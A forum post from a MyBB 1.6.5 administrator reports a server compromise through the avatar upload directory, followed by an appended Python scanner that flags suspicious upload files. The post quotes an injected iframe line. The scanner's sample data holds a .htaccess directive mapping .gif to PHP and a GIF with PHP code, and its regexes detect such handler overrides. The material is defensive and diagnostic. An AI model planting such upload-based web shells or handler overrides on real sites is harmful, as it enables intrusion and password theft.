2012-01-30, 04:13 PM
Hey,
I can verify that MyBB 1.6.5 has been hacked.
I have a forum where the hacker could freely upload files into the /avatars/ directory. This person started uploading .php files that gave him access to all parts of the server. He can browse the whole server and edit files, and thus was able to edit settings.php where he can easily place
echo "<iframe src=\"malwaresite\"></iframe>";
I started deleting those files, and now recently he uploaded .gif files with PHP code in them, and he added a .htaccess file that tells the webserver that .gif files should be handled as PHP.
The GIF/PHP file tried to steal passwords from logged-in users.
As he is able to browse the server, he can obviously also see the SQL password and thus edit all sorts of stuff on the SQL server, like templates, users, etc.
No usergroup on the forum has the right to upload files to the server other than for the avatars. This hacker was able to upload files into /cache/, /uploads/, /uploads/avatars/ and /uploads/201201/.
I don't use FBConnect btw. I have a few plugins though which are: Awaiting Activation Message (1.6), Akismet (1.2.1), Auto Media (1.1.9), Spider Bots (1.1), Forum Cleaner (2.5.1), Google Analytics (1.5), Gravatar (0.1), Image Resizer & Optimizer with GD (1.1.1), ProStats (1.8), Registration Security Question (1.2), and Thank You/Like System (1.3.1).
I also want to note that to solve the problem (as an emergency measure), I have chmodded all configuration back to 755. Even the cache and uploads directories are non-writable right now. (Except for /uploads/avatars.)
I obviously also keep a close eye on that directory now....
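As an added example (not part of the post above and not MyBB's own code), a small Python scanner that walks an uploads tree and flags the three things the post describes: a dropped .htaccess that changes how files are handled, image files that carry a PHP open tag, and non-image files sitting in directories that should only hold images. The directory layout, file names and file contents are constructed for the demonstration.

```python
import os
import re
import tempfile

# Constructed sample tree (hypothetical): a clean avatar, a "GIF" with PHP inside,
# an .htaccess that remaps .gif to PHP, a clean attachment, and a stray .php in cache/.
SAMPLE_FILES = {
    "avatars/avatar_1.gif": b"GIF89a" + b"\x00" * 16,
    "avatars/avatar_2.gif": b"GIF89a<?php echo 'x'; ?>",
    "avatars/.htaccess": b"AddHandler application/x-httpd-php .gif\n",
    "201201/post_1.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8,
    "cache/x.php": b"<?php phpinfo(); ?>",
}

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Directives that change how the server interprets or executes a file type.
HANDLER_DIRECTIVE = re.compile(
    rb"^\s*(AddHandler|AddType|SetHandler|ForceType|php_value|php_flag)\b", re.I | re.M)
MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".jpg": (b"\xff\xd8\xff",),
         ".jpeg": (b"\xff\xd8\xff",), ".png": (b"\x89PNG\r\n\x1a\n",)}

def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings for an upload tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read(64 * 1024)  # head is enough for magic bytes and injected tags
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                reason = "handler override" if HANDLER_DIRECTIVE.search(data) else "unexpected .htaccess"
                findings.append((rel, reason))
            elif ext not in MAGIC:
                findings.append((rel, "disallowed extension"))
            else:
                if not data.startswith(MAGIC[ext]):
                    findings.append((rel, "magic bytes do not match extension"))
                if PHP_TAG.search(data):
                    findings.append((rel, "PHP open tag inside image"))
    return sorted(findings)

def build_sample_dir():
    """Write the constructed sample tree to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="uploads_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, reason in scan_upload_dir(build_sample_dir()):
        print(f"{rel}: {reason}")
```

Run it against the real /uploads and /cache trees instead of the sample to get a list of files to review; the clean avatar and the clean attachment produce no findings.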